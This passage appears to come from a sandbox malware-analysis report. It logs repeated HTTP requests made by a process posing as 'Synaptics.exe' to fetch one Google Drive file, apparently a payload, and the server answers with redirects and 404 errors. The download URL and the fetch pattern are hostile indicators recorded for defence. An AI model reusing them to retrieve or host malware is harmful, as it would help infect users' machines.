                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    38192.168.2.949776142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:36 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:36 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7Y7DTRfb37wmeygo-osyZHOQC6LdETDiKai0i-MnQRYumN4Y7ly3Rr01zS_bbNp35u
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:36 GMT
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-2Ma45EpewXIetwEGGQiNbA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:36 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:36 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 30 38 46 78 33 77 59 37 75 47 4d 79 66 4a 46 47 6d 50 32 30 34 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="08Fx3wY7uGMyfJFGmP204g">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:36 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    39192.168.2.949785142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:37 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-PhztMQkavv3hK-odUuj3NA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    40192.168.2.949784142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:37 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:37 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:37 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-dx-hmcoJCplZQjFqc_iW9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    41192.168.2.949787142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:38 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:38 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-NXkpvRQmjq03ed_1RSuJ9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    42192.168.2.949788142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:38 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:39 UTC1243INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7DXWhOdjjGpH5Ee5m4wo3Ijp5Eb1wwTt2GJn2YbdCEDhw_h4yCTeVz8ZpDipIccCqI
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:38 GMT
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-kbXeYQMNDWpQuSBDYTZssA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:39 UTC147INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                    2024-12-30 10:25:39 UTC1390INData Raw: 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 75 36 78 57 78 62 41 43 6b 74 44 4d 37 2d 59 6d 65 62 78 59 76 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b 70 61 64 64 69 6e 67
                                                                                                                    Data Ascii: t Found)!!1</title><style nonce="u6xWxbACktDM7-YmebxYvQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                    2024-12-30 10:25:39 UTC115INData Raw: 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    43192.168.2.949790142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:38 UTC143OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    2024-12-30 10:25:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:38 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-WIbGBfD9Q_xY11B4eKx-Hg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    44192.168.2.949789142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:39 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                    Connection: Keep-Alive
                                                                                                                    Cookie: NID=520=YU5UUATdZGRfjNE3df9hktSlHAsyYK82OIVAelHq5ywyWWpxY0y42ztEncQDash7G4aWAgXZbrLS9US_8AhP9Cp9hGE_Y1B65SAmpZrF_rspi-yXLIy7yCPeubxya-4mb03LyjTUZB7OTAN_rvMWJA8BgI9vayxofSxXChHajJqhbUxA8KmKhMg
                                                                                                                    2024-12-30 10:25:39 UTC1250INHTTP/1.1 404 Not Found
                                                                                                                    X-GUploader-UploadID: AFiumC7DCxlNerWapFpc1sWBylio5fQTsLIyRTppP6zJDM6KOmmDhFN1fD74vrK87aKJ2ku1J60Q79M
                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Na5BI9FdRkLEuNQ1IaNykw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Content-Length: 1652
                                                                                                                    Server: UploadServer
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                    Connection: close
                                                                                                                    2024-12-30 10:25:39 UTC140INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20
                                                                                                                    Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                    2024-12-30 10:25:39 UTC1390INData Raw: 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 45 4f 77 4c 68 75 38 51 6f 38 55 6e 73 30 63 36 5f 78 37 6c 6b 51 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69 6e 2d 68 65 69 67 68 74 3a 31 38 30 70 78 3b
                                                                                                                    Data Ascii: 404 (Not Found)!!1</title><style nonce="EOwLhu8Qo8Uns0c6_x7lkQ">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                    2024-12-30 10:25:39 UTC122INData Raw: 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                                    Data Ascii: b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    45192.168.2.949792142.250.185.784437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                    2024-12-30 10:25:39 UTC345OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                    Host: docs.google.com
                                                                                                                    Cache-Control: no-cache
                                                                                                                    Cookie: NID=520=GG50B5bNv6sgXACql__W2PXcKZPl7tvWh7yCyN5O4G1FTVXRl9DITtg7F0NDTb1C9t5S152i_ICLfAe1H2fxnTJ8JrEDVAVRPZae_sL_6AH5SaTjnPk2h4AqLCoE5njkS2pPKExFaP_qi_kRcBh1BP4swSFF2VSB0u2jDSWnNsXH-zRVFWAAOxkC
                                                                                                                    2024-12-30 10:25:39 UTC1314INHTTP/1.1 303 See Other
                                                                                                                    Content-Type: application/binary
                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                    Pragma: no-cache
                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                    Date: Mon, 30 Dec 2024 10:25:39 GMT
                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-DviTcj50V84dJr9BaUBAPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                    Server: ESF
                                                                                                                    Content-Length: 0
                                                                                                                    X-XSS-Protection: 0
                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                    Connection: close


                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                    46192.168.2.949793142.250.186.974437464C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                    TimestampBytes transferredDirectionData
